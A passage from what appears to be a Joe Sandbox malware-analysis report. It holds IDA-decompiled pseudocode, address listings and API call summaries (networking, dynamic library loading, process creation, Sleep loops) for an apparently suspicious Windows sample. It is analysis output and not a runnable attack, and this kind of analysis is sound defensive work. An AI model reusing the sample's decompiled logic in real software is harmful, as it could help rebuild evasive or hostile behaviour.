								_t334 = _t333 + 0x20;
								 *(_t329 - 0x48) = _t237;
								do {
									L27:
									__imp___time64(0);
									_t326 = _t156;
									_t157 =  *0x3e8570; // 0x0
									_t335 = _t334 + 4;
									_t323 = _t298;
									__eflags = _t157 - 2;
									if(_t157 == 2) {
										L31:
										_t159 = E003C36E0(_t323, _t326, _t329 - 0xc, _t329 - 0x5c0,  *((intOrPtr*)(_t329 - 0x14)),  *(_t329 - 0x10));
										_t335 = _t335 + 0x10;
										asm("sbb edx, 0x0");
										 *((intOrPtr*)(_t329 - 0x14)) = _t326 - 0x708;
										 *(_t329 - 0x10) = _t323;
										__eflags = _t159 - 1;
										if(_t159 == 1) {
											 *0x3e85ac = _t159;
										}
										L33:
										_t161 = _t326 -  *(_t329 - 0x44);
										__eflags = _t161;
										asm("sbb ecx, [ebp-0x40]");
										 *(_t329 - 0x5c) = _t323;
										if(__eflags < 0) {
											L40:
											_t326 = _t326 -  *((intOrPtr*)(_t329 - 0x30));
											__eflags = _t326;
											asm("sbb edi, [ebp-0x2c]");
											 *(_t329 - 0x5c) = _t323;
											if(__eflags < 0) {
												L47:
												_t162 = E003C9890( *((intOrPtr*)(_t329 - 0x5bc)));
												__eflags = _t162;
												if(_t162 == 0) {
													L62:
													_t237 = 0;
													__eflags = 0;
													goto L63;
												}
												L48:
												_push(1);
												_push(_t329 - 0x5c0);
												_t171 = E003C5A10();
												_t335 = _t335 + 8;
												__eflags = _t171;
												if(__eflags == 0) {
													goto L62;
												}
												L49:
												_t298 = _t329 - 0x5c0;
												_t172 = E003C7560(_t237, __eflags, _t298);
												_t335 = _t335 + 4;
												__eflags = _t172;
												if(_t172 == 0) {
													L61:
													__eflags =  *0x3e85ac;
													if( *0x3e85ac != 0) {
														L67:
														E003C1700(_t329 - 0xc);
														E003CF850(_t237, _t329 - 0x5c0);
														E003CC930(_t329 - 4);
														_t238 = 0;
														__eflags = 0;
														__eflags =  *0x3e85ac - _t238; // 0x0
														if(__eflags == 0) {
															L81:
															E003C9480();
															E003C7E10();
															ExitProcess(_t238);
														} else {
															L69:
															_t304 =  *0x3e8628; // 0x622508
															_t327 = 0;
															 *((intOrPtr*)(_t329 - 0x70)) = 0;
															 *((intOrPtr*)(_t329 - 0x6c)) = 0;
															 *((intOrPtr*)(_t329 - 0x68)) = 0;
															 *((intOrPtr*)(_t329 - 0x64)) = 0;
															 *(_t329 - 0x18) = 0;
															 *((intOrPtr*)(_t329 - 0xb8)) = 0x44;
															 *(_t304[0x2e])(_t329 - 0xb8);
															E003C8030(_t329 - 0x18);
															_t180 = E003D1D90(0x20a, 0);
															_t239 = _t180;
															__eflags = _t239;
															if(_t239 == 0) {
																L80:
																_t306 =  *0x3e8628; // 0x622508
																 *(_t306[0x36])( *(_t329 - 0x18), _t327, _t327, _t327, _t327, _t327, _t327, _t239, _t329 - 0xb8, _t329 - 0x70);
																_t307 =  *0x3e8628; // 0x622508
																 *(_t307[0x3e])( *((intOrPtr*)(_t329 - 0x70)));
																_t308 =  *0x3e8628; // 0x622508
																 *(_t308[0x3e])( *((intOrPtr*)(_t329 - 0x6c)));
																E003CBB40( *(_t329 - 0x18));
																_t238 = 0;
																__eflags = 0;
																goto L81;
															}
															L70:
															_t309 =  *(_t329 - 0x18);
															_t328 = 0x104;
															_t324 = 0;
															__eflags = 0;
															while(1) {
																L71:
																_t131 =  &(_t328[0x1fffffbe]); // 0x7ffffffe
																__eflags = _t131;
																if(_t131 == 0) {
																	break;
																}
																L72:
																_t271 =  *_t309 & 0x0000ffff;
																__eflags = _t271;
																if(_t271 == 0) {
																	break;
																}
																L73:
																 *_t180 = _t271;
																_t180 =  &(_t180[0]);
																_t309 =  &(_t309[1]);
																_t328 = _t328 - 1;
																__eflags = _t328;
																if(_t328 != 0) {
																	continue;
																}
																L74:
																L76:
																_t180 = _t180 - 2;
																__eflags = _t180;
																_t324 = 0x8007007a;
																L77:
																 *_t180 = 0;
																__eflags = _t324;
																if(_t324 >= 0) {
																	_t189 =  *0x3e8628; // 0x622508
																	 *(_t189[0x7a])(_t239);
																}
																_t327 = 0;
																__eflags = 0;
																goto L80;
															}
															L75:
															__eflags = _t328;
															if(_t328 != 0) {
																goto L77;
															}
															goto L76;
														}
													}
													goto L62;
												}
												L50:
												__eflags =  *0x3e85ac;
												if( *0x3e85ac != 0) {
													goto L67;
												}
												L51:
												_t191 =  *0x3e8584; // 0x0
												_t326 = 0xa;
												__eflags = _t191;
												if(_t191 == 0) {
													L53:
													_t192 =  *(_t329 - 0x24);
													__eflags = _t192;
													if(_t192 <= 0) {
														while(1) {
															L55:
															_t272 =  *0x3e8584; // 0x0
															__eflags = _t272;
															if(_t272 != 0) {
																goto L57;
															}
															L56:
															_t298 =  *0x3e8628; // 0x622508
															 *(_t298[0x32])(0x4e20);
															_t326 = _t326 - 1;
															__eflags = _t326;
															if(_t326 > 0) {
																continue;
															}
															goto L57;
														}
														goto L57;
													}
													L54:
													_t196 = _t192 - 1;
													__eflags = _t196;
													 *(_t329 - 0x24) = _t196;
													_t326 = 1;
													goto L55;
												}
												L52:
												_t102 = _t326 - 5; // 0x5
												_t192 = _t102;
												 *0x3e8584 = 0;
												goto L54;
											}
											L41:
											if(__eflags > 0) {
												L43:
												_t326 = E003CF2D0(_t329 - 0x5c0);
												_t198 = E003C99A0(_t237, _t329 - 0x19, _t323, _t197, _t197);
												_push(8);
												__eflags = _t198;
												if(__eflags == 0) {
													_push(_t329 - 0x9c0);
													E003C9090(__eflags);
													E003C9090(__eflags, _t329 - 0xdc0, 0xa);
													_push(_t329 - 0xdc0);
													_t312 = _t329 - 0x9c0;
													_push(_t312);
													_push(0xe);
													_push(_t329 - 0x5c0);
												} else {
													_push(_t329 - 0x9c0);
													E003C9090(__eflags);
													E003C9090(__eflags, _t329 - 0xdc0, 9);
													_t312 = _t329 - 0xdc0;
													_push(_t312);
													_push(_t329 - 0x9c0);
													_push(0xe);
													_push(_t329 - 0x5c0);
												}
												E003C5A10();
												_t204 = E003CBB40(_t326);
												__imp___time64(0);
												_t335 = _t335 + 0x28;
												 *((intOrPtr*)(_t329 - 0x30)) = _t204;
												 *((intOrPtr*)(_t329 - 0x2c)) = _t312;
												goto L47;
											}
											L42:
											__eflags = _t326 - 0x7080;
											if(_t326 <= 0x7080) {
												goto L47;
											}
											goto L43;
										}
										L34:
										if(__eflags > 0) {
											L36:
											_t314 =  *0x3e857c; // 0x0
											_t210 = _t326 -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x28)) + _t314 * 8));
											__eflags = _t210;
											_t237 = _t323;
											asm("sbb ebx, [ecx+edx*8+0x4]");
											 *(_t329 - 0x5c) = _t323;
											if(__eflags < 0) {
												goto L40;
											}
											L37:
											if(__eflags > 0) {
												L39:
												 *(_t329 - 0x44) = _t326;
												 *(_t329 - 0x40) = _t323;
												_t212 = E003C1FE0(_t237, _t323, _t326, _t329 - 0xc, _t329 - 0x5c0, _t329 - 0x5b8);
												_t335 = _t335 + 0xc;
												__eflags = _t212;
												if(_t212 != 0) {
													L59:
													_t213 = E003D0AD0(_t329 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x14)));
													__eflags = _t213;
													if(_t213 == 0) {
														goto L67;
													}
													L60:
													 *0x3e857c = 0;
													goto L62;
												}
												goto L40;
											}
											L38:
											__eflags = _t210 - 0x3840;
											if(_t210 <= 0x3840) {
												goto L40;
											}
											goto L39;
										}
										L35:
										__eflags = _t161 - 0x4b0;
										if(_t161 <= 0x4b0) {
											goto L40;
										}
										goto L36;
									}
									L28:
									_t215 = _t326 -  *((intOrPtr*)(_t329 - 0x14));
									__eflags = _t215;
									asm("sbb ecx, [ebp-0x10]");
									 *(_t329 - 0x5c) = _t323;
									if(__eflags < 0) {
										goto L33;
									}
									L29:
									if(__eflags > 0) {
										goto L31;
									}
									L30:
									__eflags = _t215 - 0xe10;
									if(_t215 <= 0xe10) {
										goto L33;
									}
									goto L31;
									L57:
									_t156 =  &(( *(_t329 - 0x48))[0]);
									 *(_t329 - 0x48) = _t156;
									__eflags = _t156 - 0x64;
								} while (_t156 < 0x64);
								goto L62;
							}
							L17:
							if(__eflags > 0) {
								L19:
								_t225 = E003CAC90( *((intOrPtr*)(_t329 - 0x5b8)), _t329 - 0x5c0);
								_t335 = _t332 + 8;
								__eflags = _t225;
								if(__eflags == 0) {
									goto L63;
								}
								L20:
								 *((intOrPtr*)(_t329 - 0x3c)) = _t325;
								 *(_t329 - 0x38) = _t323;
								goto L21;
							}
							L18:
							__eflags = _t150 - 0xe10;
							if(__eflags <= 0) {
								goto L21;
							}
							goto L19;
						}
						L13:
						__eflags = _t147 - 1;
						if(__eflags != 0) {
							E003CC870(_t329 - 0x5c0, _t147);
							_t335 = _t332 + 8;
						}
						_t287 =  *0x3e8628; // 0x622508
						 *(_t287[0x32])(0x3e8);
						goto L63;
					}
					L5:
					if(__eflags > 0) {
						L7:
						_t230 = E003CD890(_t325, __eflags, _t329 - 0xc, _t329 - 0x5c0, _t329 - 0x58);
						_t331 = _t331 + 0xc;
						__eflags = _t230;
						if(_t230 == 0) {
							L11:
							_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x24));
							_t289 =  *0x3e857c; // 0x0
							 *((intOrPtr*)(_t231 + _t289 * 8)) = _t325;
							_t321 =  *0x3e857c; // 0x0
							 *(_t231 + 4 + _t321 * 8) = _t323;
							goto L12;
						}
						L8:
						__eflags = _t230 - 1;
						if(_t230 != 1) {
							E003CC870(_t329 - 0x5c0, _t230);
							_t335 = _t331 + 8;
						}
						_t232 =  *0x3e8628; // 0x622508
						 *(_t232[0x32])(0x3e8);
						goto L62;
					}
					L6:
					__eflags = _t145 - 0x3840;
					if(__eflags <= 0) {
						goto L12;
					}
					goto L7;
				}
			}



































































    0x003cfee0
    0x003cfee0
    0x003cfee0
    0x003cfee3
    0x003cfef4
    0x003cfefb
    0x00000000
    0x003cfefd
    0x003cfefd
    0x003cff0e
    0x003cff0e
    0x003d0374
    0x003d0374
    0x003d037a
    0x003d0380
    0x003d0381
    0x003d0387
    0x003d038a
    0x003cfee0
    0x003cfee0
    0x003cfee3
    0x003cfef4
    0x003cfefb
    0x00000000
    0x003cfefd
    0x003cfefd
    0x003cff0e
    0x003cff0e
    0x00000000
    0x003cfefb
    0x003d0390
    0x00000000
    0x00000000
    0x00000000
    0x003d0390
    0x003d0390
    0x003d039b
    0x003d03a0
    0x003d03a5
    0x003d03ab
    0x003d03ae
    0x003d03bf
    0x003d03c4
    0x003d03c4
    0x003d03ae
    0x003cfec8
    0x003cfece
    0x003cff15
    0x003cff16
    0x003cff25
    0x003cff27
    0x003cff2d
    0x003cff30
    0x003cff32
    0x003cff32
    0x003cff37
    0x003cff3b
    0x003cff3e
    0x003cffac
    0x003cffbb
    0x003cffbd
    0x003cffc2
    0x003cffc5
    0x003cffc7
    0x003cfff6
    0x003cffff
    0x003d0002
    0x003d0007
    0x003d0007
    0x003d000c
    0x003d000f
    0x003d0012
    0x003d0041
    0x003d0048
    0x003d004d
    0x003d0053
    0x003d0058
    0x003d005a
    0x003d005c
    0x003d0091
    0x003d00cc
    0x003d00cd
    0x003d00db
    0x003d00e6
    0x003d00ed
    0x003d00ee
    0x003d00f0
    0x003d00f6
    0x003d0093
    0x003d0099
    0x003d009a
    0x003d00a8
    0x003d00b3
    0x003d00b4
    0x003d00ba
    0x003d00bb
    0x003d00c3
    0x003d00c3
    0x003d005e
    0x003d0064
    0x003d0065
    0x003d0073
    0x003d0078
    0x003d007e
    0x003d0085
    0x003d0086
    0x003d008e
    0x003d008e
    0x003d00f7
    0x003d00fc
    0x003d00ff
    0x003d0102
    0x003d0102
    0x003d0104
    0x003d010a
    0x003d010c
    0x003d0111
    0x003d0114
    0x003d0116
    0x003d0119
    0x003d0133
    0x003d0146
    0x003d014b
    0x003d0158
    0x003d015b
    0x003d015e
    0x003d0161
    0x003d0164
    0x003d0166
    0x003d0166
    0x003d016b
    0x003d016d
    0x003d016d
    0x003d0172
    0x003d0175
    0x003d0178
    0x003d01d3
    0x003d01d3
    0x003d01d3
    0x003d01d6
    0x003d01d9
    0x003d01dc
    0x003d028f
    0x003d0295
    0x003d029a
    0x003d029c
    0x003d0372
    0x003d0372
    0x003d0372
    0x00000000
    0x003d0372
    0x003d02a2
    0x003d02a8
    0x003d02aa
    0x003d02ab
    0x003d02b0
    0x003d02b3
    0x003d02b5
    0x00000000
    0x00000000
    0x003d02bb
    0x003d02bb
    0x003d02c2
    0x003d02c7
    0x003d02ca
    0x003d02cc
    0x003d0369
    0x003d0369
    0x003d0370
    0x003d03cc
    0x003d03cf
    0x003d03da
    0x003d03e2
    0x003d03e7
    0x003d03e7
    0x003d03e9
    0x003d03ef
    0x003d04eb
    0x003d04eb
    0x003d04f0
    0x003d04f6
    0x003d03f5
    0x003d03f5
    0x003d03f5
    0x003d03fb
    0x003d0403
    0x003d0406
    0x003d0409
    0x003d040c
    0x003d040f
    0x003d0412
    0x003d0423
    0x003d0429
    0x003d0434
    0x003d0439
    0x003d043e
    0x003d0440
    0x003d0495
    0x003d049c
    0x003d04b7
    0x003d04bc
    0x003d04c9
    0x003d04ce
    0x003d04db
    0x003d04e1
    0x003d04e9
    0x003d04e9
    0x00000000
    0x003d04e9
    0x003d0442
    0x003d0442
    0x003d0445
    0x003d044a
    0x003d044a
    0x003d0450
    0x003d0450
    0x003d0450
    0x003d0456
    0x003d0458
    0x00000000
    0x00000000
    0x003d045a
    0x003d045a
    0x003d045d
    0x003d0460
    0x00000000
    0x00000000
    0x003d0462
    0x003d0462
    0x003d0465
    0x003d0468
    0x003d046b
    0x003d046b
    0x003d046c
    0x00000000
    0x00000000
    0x003d046e
    0x003d0474
    0x003d0474
    0x003d0474
    0x003d0477
    0x003d047c
    0x003d047e
    0x003d0481
    0x003d0483
    0x003d0485
    0x003d0491
    0x003d0491
    0x003d0493
    0x003d0493
    0x00000000
    0x003d0493
    0x003d0470
    0x003d0470
    0x003d0472
    0x00000000
    0x00000000
    0x00000000
    0x003d0472
    0x003d03ef
    0x00000000
    0x003d0370
    0x003d02d2
    0x003d02d2
    0x003d02d9
    0x00000000
    0x00000000
    0x003d02df
    0x003d02df
    0x003d02e4
    0x003d02e9
    0x003d02eb
    0x003d02fc
    0x003d02fc
    0x003d02ff
    0x003d0301
    0x003d0310
    0x003d0310
    0x003d0310
    0x003d0316
    0x003d0318
    0x00000000
    0x00000000
    0x003d031a
    0x003d031a
    0x003d032b
    0x003d032d
    0x003d032e
    0x003d0330
    0x00000000
    0x00000000
    0x00000000
    0x003d0330
    0x00000000
    0x003d0310
    0x003d0303
    0x003d0303
    0x003d0303
    0x003d0304
    0x003d0307
    0x00000000
    0x003d0307
    0x003d02ed
    0x003d02ed
    0x003d02ed
    0x003d02f0
    0x00000000
    0x003d02f0
    0x003d01e2
    0x003d01e2
    0x003d01f0
    0x003d01fb
    0x003d0201
    0x003d0206
    0x003d0208
    0x003d020a
    0x003d0245
    0x003d0246
    0x003d0254
    0x003d025f
    0x003d0260
    0x003d0266
    0x003d0267
    0x003d026f
    0x003d020c
    0x003d0212
    0x003d0213
    0x003d0221
    0x003d0226
    0x003d022c
    0x003d0233
    0x003d0234
    0x003d023c
    0x003d023c
    0x003d0270
    0x003d0279
    0x003d0280
    0x003d0286
    0x003d0289
    0x003d028c
    0x00000000
    0x003d028c
    0x003d01e4
    0x003d01e4
    0x003d01ea
    0x00000000
    0x00000000
    0x00000000
    0x003d01ea
    0x003d017a
    0x003d017a
    0x003d0183
    0x003d018c
    0x003d0194
    0x003d0194
    0x003d0197
    0x003d0199
    0x003d019d
    0x003d01a0
    0x00000000
    0x00000000
    0x003d01a2
    0x003d01a2
    0x003d01ab
    0x003d01bd
    0x003d01c0
    0x003d01c3
    0x003d01c8
    0x003d01cb
    0x003d01cd
    0x003d0344
    0x003d0354
    0x003d0359
    0x003d035b
    0x00000000
    0x00000000
    0x003d035d
    0x003d035d
    0x00000000
    0x003d035d
    0x00000000
    0x003d01cd
    0x003d01a4
    0x003d01a4
    0x003d01a9
    0x00000000
    0x00000000
    0x00000000
    0x003d01a9
    0x003d017c
    0x003d017c
    0x003d0181
    0x00000000
    0x00000000
    0x00000000
    0x003d0181
    0x003d011b
    0x003d011d
    0x003d011d
    0x003d0122
    0x003d0125
    0x003d0128
    0x00000000
    0x00000000
    0x003d012a
    0x003d012a
    0x00000000
    0x00000000
    0x003d012c
    0x003d012c
    0x003d0131
    0x00000000
    0x00000000
    0x00000000
    0x003d0332
    0x003d0335
    0x003d0336
    0x003d0339
    0x003d0339
    0x00000000
    0x003d0342
    0x003d0014
    0x003d0014
    0x003d001d
    0x003d002b
    0x003d0030
    0x003d0033
    0x003d0035
    0x00000000
    0x00000000
    0x003d003b
    0x003d003b
    0x003d003e
    0x00000000
    0x003d003e
    0x003d0016
    0x003d0016
    0x003d001b
    0x00000000
    0x00000000
    0x00000000
    0x003d001b
    0x003cffc9
    0x003cffc9
    0x003cffcc
    0x003cffd6
    0x003cffdb
    0x003cffdb
    0x003cffde
    0x003cffef
    0x00000000
    0x003cffef
    0x003cff40
    0x003cff40
    0x003cff49
    0x003cff58
    0x003cff5d
    0x003cff60
    0x003cff62
    0x003cff90
    0x003cff96
    0x003cff99
    0x003cff9f
    0x003cffa2
    0x003cffa8
    0x00000000
    0x003cffa8
    0x003cff64
    0x003cff64
    0x003cff67
    0x003cff71
    0x003cff76
    0x003cff76
    0x003cff79
    0x003cff89
    0x00000000
    0x003cff89
    0x003cff42
    0x003cff42
    0x003cff47
    0x00000000
    0x00000000
    0x00000000
    0x003cff47

    APIs
    • _time64.MSVCRT ref: 003CFF16
      • Part of subcall function 003CD890: ??2@YAPAXI@Z.MSVCRT ref: 003CD8EA
      • Part of subcall function 003CD890: ??3@YAXPAX@Z.MSVCRT ref: 003CD929
      • Part of subcall function 003CD890: _time64.MSVCRT ref: 003CD94B
      • Part of subcall function 003CD890: ??3@YAXPAX@Z.MSVCRT ref: 003CD97B
      • Part of subcall function 003D1B80: ??2@YAPAXI@Z.MSVCRT ref: 003D1BAF
      • Part of subcall function 003D1B80: ??3@YAXPAX@Z.MSVCRT ref: 003D1BEE
      • Part of subcall function 003D1B80: _time64.MSVCRT ref: 003D1C10
      • Part of subcall function 003D1B80: ??3@YAXPAX@Z.MSVCRT ref: 003D1C3D
      • Part of subcall function 003CAC90: ??3@YAXPAX@Z.MSVCRT ref: 003CACCF
      • Part of subcall function 003CAC90: ??3@YAXPAX@Z.MSVCRT ref: 003CAE7A
      • Part of subcall function 003D12C0: WSAStartup.WS2_32(00000202,?), ref: 003D12E2
      • Part of subcall function 003D12C0: gethostname.WS2_32(?,000000FF), ref: 003D1302
      • Part of subcall function 003D12C0: getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 003D1322
      • Part of subcall function 003D12C0: freeaddrinfo.WS2_32(00000000), ref: 003D1380
      • Part of subcall function 003D12C0: WSACleanup.WS2_32 ref: 003D1386
      • Part of subcall function 003C5A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,003CFE81), ref: 003C5ABF
    • _time64.MSVCRT ref: 003D0104
      • Part of subcall function 003C36E0: memcpy.MSVCRT ref: 003C3BC0
      • Part of subcall function 003C1FE0: ??2@YAPAXI@Z.MSVCRT ref: 003C2024
      • Part of subcall function 003C1FE0: ??3@YAXPAX@Z.MSVCRT ref: 003C20A1
      • Part of subcall function 003C1FE0: _time64.MSVCRT ref: 003C20D2
      • Part of subcall function 003C1FE0: ??3@YAXPAX@Z.MSVCRT ref: 003C20F9
      • Part of subcall function 003C99A0: WSAStartup.WS2_32(00000202,?), ref: 003C99CA
      • Part of subcall function 003C99A0: freeaddrinfo.WS2_32(?), ref: 003C9A2B
      • Part of subcall function 003C99A0: getaddrinfo.WS2_32(?,00000000,?,?), ref: 003C9AC6
      • Part of subcall function 003C99A0: freeaddrinfo.WS2_32(?), ref: 003C9B0E
      • Part of subcall function 003C99A0: WSACleanup.WS2_32 ref: 003C9B34
    • _time64.MSVCRT ref: 003D0280
      • Part of subcall function 003E0A40: ??2@YAPAXI@Z.MSVCRT ref: 003E0AC0
      • Part of subcall function 003E0A40: ??3@YAXPAX@Z.MSVCRT ref: 003E0B35
      • Part of subcall function 003E0A40: _time64.MSVCRT ref: 003E0B63
      • Part of subcall function 003E0A40: ??3@YAXPAX@Z.MSVCRT ref: 003E0B8B
      • Part of subcall function 003CF850: ??3@YAXPAX@Z.MSVCRT ref: 003CF90D
      • Part of subcall function 003CF850: ??3@YAXPAX@Z.MSVCRT ref: 003CF924
      • Part of subcall function 003CF850: ??3@YAXPAX@Z.MSVCRT ref: 003CF955
    • ExitProcess.KERNEL32 ref: 003D04F6
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003C9480: FreeLibrary.KERNELBASE(00000000,003D04F0), ref: 003C94B1
      • Part of subcall function 003CC870: _itow.MSVCRT ref: 003CC889
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CFC18, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145sleep

    Control-flow Graph

    C-Code - Quality: 56%
    			E003CFC18() {
				int _t200;
				int _t202;
				int _t204;
				void* _t210;
				void* _t211;
				signed int* _t216;
				int _t225;
				void* _t227;
				long _t228;
				intOrPtr _t229;
				long _t230;
				void* _t233;
				long _t240;
				int _t249;
				long _t251;
				long _t255;
				long _t256;
				long _t258;
				long _t261;
				void* _t263;
				long _t267;
				int _t268;
				long _t270;
				long _t272;
				long _t273;
				long _t274;
				long _t275;
				long _t279;
				long _t280;
				long _t284;
				long _t286;
				int _t292;
				long _t298;
				long _t300;
				long _t301;
				long _t303;
				long _t313;
				long _t318;
				intOrPtr _t319;
				int _t320;
				signed int* _t334;
				int _t336;
				signed int _t351;
				int _t355;
				signed int _t369;
				signed int _t385;
				long _t390;
				int _t405;
				signed int _t407;
				int _t419;
				int _t420;
				int _t422;
				int _t423;
				int _t424;
				signed short* _t425;
				int _t434;
				signed int _t435;
				int _t440;
				int _t446;
				signed int _t448;
				signed int _t455;
				int _t457;
				int _t459;
				void* _t460;
				void* _t461;
				void* _t463;
				long _t464;
				void* _t466;
				void* _t467;
				void* _t468;
				void* _t471;
				void* _t473;
				void* _t474;
				void* _t475;
				void* _t480;

				do {
					_t336 =  *0x3e8628; // 0x622508
					 *(_t466 - 0x14) =  *(_t466 - 0x14) +  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x30))))();
					asm("adc [ebp-0x10], ecx");
					Sleep(1); // executed
				} while (_t461 - 1 > _t333);
				_t200 =  *0x3e8628; // 0x622508
				 *0x3e85dc = _t333;
				 *0x3e85f8 = _t333;
				 *0x3e85fc = _t333;
				 *0x3e85c8 = _t333;
				 *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xbc))))(_t333, _t466 - 0x9c0, 0x200);
				_t202 =  *0x3e8628; // 0x622508
				 *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1e8))))(_t466 - 0x9c0);
				_t204 =  *0x3e8628; // 0x622508
				 *((intOrPtr*)( *((intOrPtr*)(_t204 + 0x1d8))))(_t466 - 0x9c0);
				SetCurrentDirectoryW(_t466 - 0x9c0);
				_t419 =  *0x3e8628; // 0x622508
				srand( *((intOrPtr*)( *((intOrPtr*)(_t419 + 0xd0))))());
				_t468 = _t467 + 4; // executed
				_t210 = E003CEB30(); // executed
				_t211 = E003CBAF0(_t210);
				_t478 = _t211;
				if(_t211 == 0) {
					L89:
					_t480 =  *0x3e85ac - _t333; // 0x0
					if(_t480 == 0) {
						L102:
						E003C9480();
						E003C7E10();
						ExitProcess(_t333);
					}
					_t420 =  *0x3e8628; // 0x622508
					_t463 = 0;
					 *((intOrPtr*)(_t466 - 0x70)) = 0;
					 *((intOrPtr*)(_t466 - 0x6c)) = 0;
					 *((intOrPtr*)(_t466 - 0x68)) = 0;
					 *((intOrPtr*)(_t466 - 0x64)) = 0;
					 *(_t466 - 0x18) = 0;
					 *((intOrPtr*)(_t466 - 0xb8)) = 0x44;
					 *((intOrPtr*)( *((intOrPtr*)(_t420 + 0xb8))))(_t466 - 0xb8);
					E003C8030(_t466 - 0x18);
					_t216 = E003D1D90(0x20a, 0);
					_t334 = _t216;
					if(_t334 == 0) {
						L101:
						_t422 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t422 + 0xd8))))( *(_t466 - 0x18), _t463, _t463, _t463, _t463, _t463, _t463, _t334, _t466 - 0xb8, _t466 - 0x70);
						_t423 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t423 + 0xf8))))( *((intOrPtr*)(_t466 - 0x70)));
						_t424 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t424 + 0xf8))))( *((intOrPtr*)(_t466 - 0x6c)));
						E003CBB40( *(_t466 - 0x18));
						_t333 = 0;
						goto L102;
					}
					_t425 =  *(_t466 - 0x18);
					_t464 = 0x104;
					_t460 = 0;
					while(1) {
						_t187 = _t464 + 0x7ffffefa; // 0x7ffffffe
						if(_t187 == 0) {
							break;
						}
						_t351 =  *_t425 & 0x0000ffff;
						if(_t351 == 0) {
							break;
						}
						 *_t216 = _t351;
						_t216 =  &(_t216[0]);
						_t425 =  &(_t425[1]);
						_t464 = _t464 - 1;
						if(_t464 != 0) {
							continue;
						}
						L97:
						_t216 = _t216 - 2;
						_t460 = 0x8007007a;
						L98:
						 *_t216 = 0;
						if(_t460 >= 0) {
							_t225 =  *0x3e8628; // 0x622508
							 *((intOrPtr*)( *((intOrPtr*)(_t225 + 0x1e8))))(_t334);
						}
						_t463 = 0;
						goto L101;
					}
					__eflags = _t464;
					if(_t464 != 0) {
						goto L98;
					}
					goto L97;
				}
				_t227 = E003C3500(_t466 - 4, _t478); // executed
				_t479 = _t227;
				if(_t227 == 0) {
					 *(_t466 - 0x34) = _t333;
					_t228 = GetCurrentProcess();
					__imp__IsWow64Process(_t228, _t466 - 0x34);
					__eflags = _t228;
					if(_t228 != 0) {
						E003CE7D0(_t466 - 0x9c0,  *(_t466 - 0x34)); // executed
						_t468 = _t468 + 8;
					}
					_t229 = E003E1210();
					_push(8);
					 *0x3e8580 = _t229; // executed
					L003CA47E(); // executed
					_t468 = _t468 + 4;
					__eflags = _t229 - _t333;
					if(_t229 == _t333) {
						_t465 = 0;
						__eflags = 0;
					} else {
						_t465 = E003CE850(_t229);
					}
					_t230 = E003C3D50(_t465); // executed
					__eflags = _t230;
					if(_t230 != 0) {
						__eflags = _t465 - _t333;
						if(__eflags != 0) {
							E003C2420(_t465);
							_push(_t465);
							L003C1CB0();
							_t468 = _t468 + 4;
						}
						_t355 =  *0x3e8628; // 0x622508
						 *0x3e8570 = _t333;
						 *0x3e8584 = _t333;
						 *0x3e8574 = _t333;
						 *0x3e8578 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t355 + 0xcc))))(0x3e8594, 0x800);
						E003C1B20(_t466 - 0x5c0,  *((intOrPtr*)(_t355 + 0xcc)), __eflags);
						_t233 = E003CBB30(_t466 - 0xc);
						_push(0x34);
						 *(_t466 - 0x58) = _t333;
						 *(_t466 - 0x28) = _t333;
						L003CA47E();
						_t471 = _t468 + 4;
						__eflags = _t233 - _t333;
						if(__eflags == 0) {
							 *(_t466 - 0x5b8) = _t333;
						} else {
							 *(_t466 - 0x5b8) = E003C70B0(_t233);
						}
						E003C9090(__eflags, _t466 - 0x9c0, 3);
						E003CF550(_t466 - 0x50, _t333, _t466 - 0x9c0, 0xa, _t466 - 0x54, _t466 - 0x50);
						E003C1F00(_t466 - 0xc,  *((intOrPtr*)(_t466 - 0x54)),  *((intOrPtr*)(_t466 - 0x50)));
						_t240 = E003C69F0(_t466 - 0x5b8, _t466 - 0xc, _t466 - 0x5b8);
						_t468 = _t471 + 0x24;
						__eflags = _t240;
						if(_t240 != 0) {
							 *(_t466 - 0x5c0) = _t466 - 0xc;
							__eflags = E003D0AD0(_t466 - 0x5c0,  *((intOrPtr*)( *(_t466 - 0x5b8) + 0x14)));
							if(__eflags == 0) {
								goto L18;
							}
							E003C5700( *((intOrPtr*)(_t466 - 0x5bc)), __eflags);
							 *0x3e85ac = _t333;
							 *(_t466 - 0x30) = _t333;
							 *(_t466 - 0x2c) = _t333;
